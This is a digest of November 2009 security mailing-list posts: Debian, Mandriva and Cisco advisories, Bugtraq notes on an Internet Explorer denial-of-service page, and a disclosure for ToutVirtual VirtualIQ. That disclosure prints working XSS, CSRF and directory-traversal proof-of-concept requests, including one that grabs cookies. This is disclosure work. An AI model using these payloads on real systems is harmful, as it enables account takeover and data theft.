[SECURITY] [DSA 1930-1] New drupal6 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1930-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris November 07, 2009 http://www.debian.org/security/faq - Package: drupal6 Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE IDs: CVE-2009-2372 CVE-2009-2373 CVE-2009-2374 Debian Bug : 535435 547140 Several vulnerabilities have been found in drupal6, a fully-featured content management framework. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-2372 Gerhard Killesreiter discovered a flaw in the way user signatures are handled. It is possible for a user to inject arbitrary code via a crafted user signature. (SA-CORE-2009-007) CVE-2009-2373 Mark Piper, Sven Herrmann and Brandon Knight discovered a cross-site scripting issue in the forum module, which could be exploited via the tid parameter. (SA-CORE-2009-007) CVE-2009-2374 Sumit Datta discovered that certain drupal6 pages leak sensible information such as user credentials. (SA-CORE-2009-007) Several design flaws in the OpenID module have been fixed, which could lead to cross-site request forgeries or privilege escalations. Also, the file upload function does not process all extensions properly leading to the possible execution of arbitrary code. (SA-CORE-2009-008) For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny3. The oldstable distribution (etch) does not contain drupal6. For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 6.14-1. We recommend that you upgrade your drupal6 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.dsc Size/MD5 checksum: 1130 489d56336053311b1ee24aaf17f41ffb http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.diff.gz Size/MD5 checksum:24870 d70dfad8a6f211cb9dd62e071e5ddfd9 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb Architecture independent packages: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3_all.deb Size/MD5 checksum: 1088258 6162b6933d636065c6a07e6f6199c7df These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkr0wzIACgkQ62zWxYk/rQegCACfaCVMO8lrhfH/57iPLCgFOkp5 5ykAnifSZR4vet+YNDY3Z6vOiTSgUe/0 =o5XE -END PGP SIGNATURE-
[SECURITY] [DSA 1932-1] New pidgin packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1932-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff November 08, 2009 http://www.debian.org/security/faq - Package: pidgin Vulnerability : programming error Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-3615 It was discovered that incorrect pointer handling in the purple library, an internal component of the multi-protocol instant messaging client Pidgin, could lead to denial of service or the execution of arbitrary code through malformed contact requests. For the stable distribution (lenny), this problem has been fixed in version 2.4.3-4lenny5. For the unstable distribution (sid), this problem has been fixed in version 2.6.3-1. We recommend that you upgrade your pidgin package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427 http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5.diff.gz Size/MD5 checksum:69490 bdf5958352a704f7585d3028cd5e1fec http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5.dsc Size/MD5 checksum: 1779 43de978c046520a4919f0d5a12a20726 Architecture independent packages: http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny5_all.deb Size/MD5 checksum: 158216 5ed3ffcd4e334fc0a111b4009ab833de http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny5_all.deb Size/MD5 checksum: 7009600 17672a402481c235f6a2b783b791e746 http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny5_all.deb Size/MD5 checksum: 193484 3d39086701ad91a11702a2a7c152c6cf http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny5_all.deb Size/MD5 checksum: 275870 2f98b47825be3bdd427c0431c62b39be http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny5_all.deb Size/MD5 checksum: 133752 0902b80babf5cc2ece1b7768c219535e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_alpha.deb Size/MD5 checksum: 1803418 9ca1dbc9edbc3593f73e24f6585ae6c6 http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_alpha.deb Size/MD5 checksum: 369764 86fba3374b45f8c47f9a1dbd043858b6 http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_alpha.deb Size/MD5 checksum: 5546018 6b07e1aec08681d8d215fb1058380079 http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_alpha.deb Size/MD5 checksum: 779324 98b7af086407f89594598b0862b68129 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_amd64.deb Size/MD5 checksum: 5678040 dc9abd0e234ce486e977cf507a1a0748 http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_amd64.deb Size/MD5 checksum: 350246 9bd0d316c59474a803d860d36ffaa677 http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_amd64.deb Size/MD5 checksum: 1715330 03ce4eee9e2d9ca1065e7ec84d941e86 http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_amd64.deb Size/MD5 checksum: 729406 c277522dd8c8213fdc79906c37d6247b arm architecture (ARM) http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_arm.deb Size/MD5 checksum: 5348566 58df4a37d31b6506a456bd8dd86b3ef2 http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_arm.deb Size/MD5 checksum: 655256 c469023b397f017ebd0433ea85acee24 http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_arm.deb Size/MD5 checksum: 1490668 aa8d7c91e49530619312394071fc9fc9 http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_arm.deb Size/MD5 checksum: 315340 934e28a580a3f9596f04cb3a90a8013c hppa architecture (HP PA RISC)
[ MDVSA-2009:295 ] apache
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:295 http://www.mandriva.com/security/ ___ Package : apache Date: November 8, 2009 Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability was discovered and corrected in apache: Apache is affected by SSL injection or man-in-the-middle attacks due to a design flaw in the SSL and/or TLS protocols. A short term solution was released Sat Nov 07 2009 by the ASF team to mitigate these problems. Apache will now reject in-session renegotiation (CVE-2009-3555). Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1. This update provides a solution to this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://marc.info/?l=apache-httpd-announcem=125755783724966w=2 ___ Updated Packages: Mandriva Linux 2009.0: bb7817c8fd6d45007367f738772a6bf3 2009.0/i586/apache-base-2.2.9-12.5mdv2009.0.i586.rpm f8726194a60735e448281060ae4b36da 2009.0/i586/apache-devel-2.2.9-12.5mdv2009.0.i586.rpm fbe7be6f33026519e367e66e0b562340 2009.0/i586/apache-htcacheclean-2.2.9-12.5mdv2009.0.i586.rpm 138023055641f45f4a164e7c971a6a09 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.i586.rpm 5e688241469d2d4e99f5fd1dac76fa2f 2009.0/i586/apache-mod_cache-2.2.9-12.5mdv2009.0.i586.rpm 467f3e03bb9523d213e34310be245005 2009.0/i586/apache-mod_dav-2.2.9-12.5mdv2009.0.i586.rpm c19b8084698b3aab5e04c8e398105b64 2009.0/i586/apache-mod_dbd-2.2.9-12.5mdv2009.0.i586.rpm 6c387d03bcf96be55e5668d06468961a 2009.0/i586/apache-mod_deflate-2.2.9-12.5mdv2009.0.i586.rpm e349b4f55aa3d804295c70b9bddc923d 2009.0/i586/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.i586.rpm 3a0aca578f2caf6bd6fde3b4ea2d3d3a 2009.0/i586/apache-mod_file_cache-2.2.9-12.5mdv2009.0.i586.rpm ae1cd7db54f7858dcd3cf46316fac109 2009.0/i586/apache-mod_ldap-2.2.9-12.5mdv2009.0.i586.rpm 6d253c599f47f2aa5f872939bd685880 2009.0/i586/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.i586.rpm df04a63519e442a6c5b1c1a5dc166dce 2009.0/i586/apache-mod_proxy-2.2.9-12.5mdv2009.0.i586.rpm 0ee61ddcc9ba15f27105ac6e40b33feb 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.i586.rpm 85bd2fd587538304570dda2ee7c5 2009.0/i586/apache-mod_ssl-2.2.9-12.5mdv2009.0.i586.rpm d4eb614eb21ae8fcffcd2200808f733d 2009.0/i586/apache-modules-2.2.9-12.5mdv2009.0.i586.rpm b14ffea00afa59052bf9fa46d64502d7 2009.0/i586/apache-mod_userdir-2.2.9-12.5mdv2009.0.i586.rpm 0b50fbd6f26a4215c5a3a6741473f423 2009.0/i586/apache-mpm-event-2.2.9-12.5mdv2009.0.i586.rpm 84b03ef6c45c982d8e79ae3efa48a039 2009.0/i586/apache-mpm-itk-2.2.9-12.5mdv2009.0.i586.rpm f2d3438adfafbbd2916fd68e14ab1a5f 2009.0/i586/apache-mpm-peruser-2.2.9-12.5mdv2009.0.i586.rpm 81da89c424782750e7f48080b36d7b53 2009.0/i586/apache-mpm-prefork-2.2.9-12.5mdv2009.0.i586.rpm 3ed1f4255c574b656617d5fe8858067c 2009.0/i586/apache-mpm-worker-2.2.9-12.5mdv2009.0.i586.rpm ecbe5b3f18db2406073e54e58a79bebd 2009.0/i586/apache-source-2.2.9-12.5mdv2009.0.i586.rpm 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 71ed1d9246a9412d4da492a3d197540d 2009.0/x86_64/apache-base-2.2.9-12.5mdv2009.0.x86_64.rpm 2dc2a515c8dc7ed51d0a360689f69bd0 2009.0/x86_64/apache-devel-2.2.9-12.5mdv2009.0.x86_64.rpm 0e9c6e43d4fed842aed0302bd9a791b1 2009.0/x86_64/apache-htcacheclean-2.2.9-12.5mdv2009.0.x86_64.rpm 694b5febe352ece3681a78fe727f7509 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm 7476323e5873c8069b18eb30a6e083b4 2009.0/x86_64/apache-mod_cache-2.2.9-12.5mdv2009.0.x86_64.rpm da79b5a011f779c6d3a2f7e7a05e87ce 2009.0/x86_64/apache-mod_dav-2.2.9-12.5mdv2009.0.x86_64.rpm 8283a2cce0751f50595b959d4a00fb82 2009.0/x86_64/apache-mod_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm ab4b98932e3afd3d93a30929007ac210 2009.0/x86_64/apache-mod_deflate-2.2.9-12.5mdv2009.0.x86_64.rpm 3e696b66694d83821c393561e1bc263e 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.x86_64.rpm c1fd15eb1469a629af3c532ddfa4367f 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.5mdv2009.0.x86_64.rpm 62e77f84a029b5b06f97d0c68598b13c 2009.0/x86_64/apache-mod_ldap-2.2.9-12.5mdv2009.0.x86_64.rpm f4e7eaac49d05c28b9404b5a90744ade 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.x86_64.rpm 9a111de2c5b552a8511ff4a58c6cd8b1 2009.0/x86_64/apache-mod_proxy-2.2.9-12.5mdv2009.0.x86_64.rpm 978da0f65f1112b8e8f1f506c728b861
FRHACK01 DVDs
Hi list, FRHACK01, International IT Security Conference, was held in Besancon, France - http://www.frhack.org FRHACK was not commercial, but technical. We decided to sell DVDs of the conference to cover our expenses. If anyone has a problem with this, with FRHACK or with me = he's invited to contact me directly and we should be able to speak about it in an eyes2eyes way, like men. If u just want to flame on your blog, just go in hell. Anyway, so here it is, the first 2 DVDs of FRHACK available for FREE: http://www.frhack.org/frhack01_dvd01.iso http://www.frhack.org/frhack01_stallman.avi Enjoy /JA RIP mil I never forget my brothers
ToutVirtual VirtualIQ Multiple Vulnerabilities
Secure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.toutvirtual.com Author(s): Alberto Trivero (a.triv...@securenetwork.it) Claudio Criscione (c.crisci...@securenetwork.it) Vendor disclosure: 02/07/2009 Vendor acknowledged: 16/07/2009 Vendor patch release: notified us on 06/11/2009 Public disclosure: 07/11/2009 Advisory number: SN-2009-02 Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt *** SUMMARY *** ToutVirtual's VirtualIQ Pro is specifically designed for IT administrators responsible for managing virtual platforms. VirtualIQ Pro provides Visibility, Analytics and policy-based Optimization - all from one single console. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type II hypervisors. VirtualIQ Pro can be used to visualize, analyze and optimize your choice of virtualization platform - Citrix, Microsoft, Novell, Oracle and/or VMware. Multiple vulnerabilities has been found which a allow an attacker to conduct various XSS and CSRF attack, and other attacks due to the use of an old an not hardened version of the web server. *** VULNERABILITY DETAILS *** (a) Cross-site scripting (XSS) Due to an improper sanitization of user's input, multiple XSS attacks (reflective and stored) are possible. Reflective PoCs: http://server:9080/tvserver/server/user/setPermissions.jsp?userId=1;scriptalert(1)/scriptamp;resultresourceids=111-222-1933em...@address.tst http://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0amp;deptName=%22;alert(1);//amp;deptId=1amp;deptDesc=asd http://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);// http://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilteramp;reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E Stored XSS attacks can be triggered in the Middle Name parameter in the Edit Profile page with an HTTP request like the following: POST /tvserver/user/user.do?command=saveuserId=1 HTTP/1.1 Host: server:9080 Cookies: JSESSIONID=[...] userName=IQMANAGERfirstName=IQmiddleName=asd'; alert(document.cookie);//lastName=MANAGERemail=user%40domain.itpassword=retypePassword=redirect=nullpasswordModifed=falseisReportUser=falseroleId=1supervisorId=1departmentId=1locationId=1 (b) Cross-site request forgery (CSRF) An attacker can perform different types of CSRF attacks against a logged user. He can, for example, shutdown, start or restart an arbitrary virtual machine, schedule new activities and so on. The following HTTP request, if forged by the attacker and executed by the victim while logged on VirtualIQ, creates an arbitrary user: POST /tvserver/user/user.do?command=saveuserId= HTTP/1.1 Host: server:9080 Cookie: JSESSIONID=[...] userName=asd1firstName=asd2middleName=asd3lastName=asd4email=asd5%40asd.compassword=asd6retypePassword=asd6redirect=nullpasswordModifed=falseisReportUser=falseroleId=1supervisorId=1departmentId=1locationId=1 (c) Web server vulnerabilities VirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which multiple public vulnerabilities have been released. As a PoC, a directory traversal attack (CVE-2008-2938) can be performed as: http://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml Listing of an arbitrary directory (CVE-2006-3835) can also be obtained with the following PoC: http://192.168.229.85:9080/tvserver/server/;index.jsp (d) Information Leakage Tomcat status page should be disabled or restricted, being accessible at: http://status:9080/status Username and password to access a VM through SSH are also available in clear text in the configuration page. Since an XSS vulnerability can also be triggered in the same page, an attacker would also be able to easily capture the full credentials to access the VM with a specially crafted XSS payload. (e) Remote code execution JBoss JMX Management Console is exposed and can be used by remote attackers to execute arbitrary commands on the system: http://server:9080/jmx-console/ JBoss Web Console is exposed as well and can be used by remote attackers to execute any command on the system: http://server:9080/web-console/ *** EXPLOIT *** Attackers may exploit these issues through a common browser as explained above. *** FIX INFORMATION *** Upgrade to the latest version, at the moment 3.5 build 10.14.2009 *** WORKAROUNDS *** -- * *** LEGAL NOTICES *** * Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is
DoS vulnerability in Internet Explorer
Hello Bugtraq! I want to warn you about Denial of Service vulnerability in Internet Explorer. Yesterday I already informed Microsoft. This attack I called DoS via homepage. DoS: http://websecurity.com.ua/uploads/2009/IE%20DoS%20Exploit10.html With this exploit in IE6 the browser blocks, so it's become impossible to use it and it's only possible to close it (via Task Manager). With this exploit in IE7 the browser freezes after click on the link . Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too). I mentioned about this vulnerability at my site (http://websecurity.com.ua/3658/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Re: DoS vulnerability in Internet Explorer
Not sure if this matters or not but it also worked on blackberry browser on blackberry 8800. Regards. --Original Message-- From: MustLive To: bugtraq@securityfocus.com Sent: Nov 8, 2009 8:54 AM Subject: DoS vulnerability in Internet Explorer Hello Bugtraq! I want to warn you about Denial of Service vulnerability in Internet Explorer. Yesterday I already informed Microsoft. This attack I called DoS via homepage. DoS: http://websecurity.com.ua/uploads/2009/IE%20DoS%20Exploit10.html With this exploit in IE6 the browser blocks, so it's become impossible to use it and it's only possible to close it (via Task Manager). With this exploit in IE7 the browser freezes after click on the link . Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too). I mentioned about this vulnerability at my site (http://websecurity.com.ua/3658/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Sent via BlackBerry from T-Mobile
Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability Advisory ID: cisco-sa-20091109-tls http://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml Revision 1.0 For Public Release 2009 November 9 1600 UTC (GMT) Summary === An industry-wide vulnerability exists in the Transport Layer Security (TLS) protocol that could impact any Cisco product that uses any version of TLS and SSL. The vulnerability exists in how the protocol handles session renegotiation and exposes users to a potential man-in-the-middle attack. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml. Affected Products = Cisco is currently evaluating products for possible exposure to these TLS issues. Products will only be listed in the Vulnerable Products or Products Confirmed Not Vulnerable sections of this advisory when a final determination about product exposure is made. Products that are not listed in either of these two sections are still being evaluated. Vulnerable Products - --- This section will be updated when more information is available. Products Confirmed Not Vulnerable - - The following products are confirmed not vulnerable: * Cisco AnyConnect VPN Client This section will be updated when more information is available. Details === TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet. An industry-wide vulnerability exists in the TLS protocol that could impact any Cisco product that uses any version of TLS and SSL. The vulnerability exists in how the protocol handles session renegotiation and exposes users to a potential man-in-the-middle attack. The following Cisco Bug IDs are being used to track potential exposure to the SSL and TLS issues. The bugs listed below do not confirm that a product is vulnerable, but rather that the product is under investigation by the appropriate product teams. Registered Cisco customers can view these bugs via Cisco's Bug Toolkit: http://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl ++ | Product |Bug ID | |+---| | Cisco Adaptive Security| CSCtd01491| | Device Manager (ASDM) | | |+---| | Cisco AON Software | CSCtd01646| || | |+---| | Cisco AON Healthcare for | CSCtd01652| | HIPAA and ePrescription| | |+---| | Cisco Application and | CSCtd01529| | Content Networking System | | | (ACNS) Software| | |+---| | Cisco Application | CSCtd01480| | Networking Manager | | |+---| | Cisco ASA 5500 Series | CSCtd00697| | Adaptive Security | | | Appliances | | |+---| | Cisco ASA Advanced | | | Inspection and Prevention | CSCtd01539| | (AIP) Security Services| | | Module | | |+---| | Cisco AVS 3100 Series | CSCtd01566| | Application Velocity | | | System | | |+---| | Cisco Catalyst 6500 Series | CSCtd06389| | SSL Services Module| | |+---| | Firewall Services Module | CSCtd04061| | FWSM | | |+---| | Cisco CSS 11000 Series | CSCtd01636| | Content Services Switches | | |+---| | Cisco Unified SIP Phones | CSCtd01446
Re: FRHACK01 DVDs
New CC number, have to update account information, blablabla... SORRY Here it is for now: https://free-security.org/frhack/frhack01_dvd01.iso https://free-security.org/frhack/frhack01_stallman.avi /JA C0m3 b...@ck s00n mi1 ;p
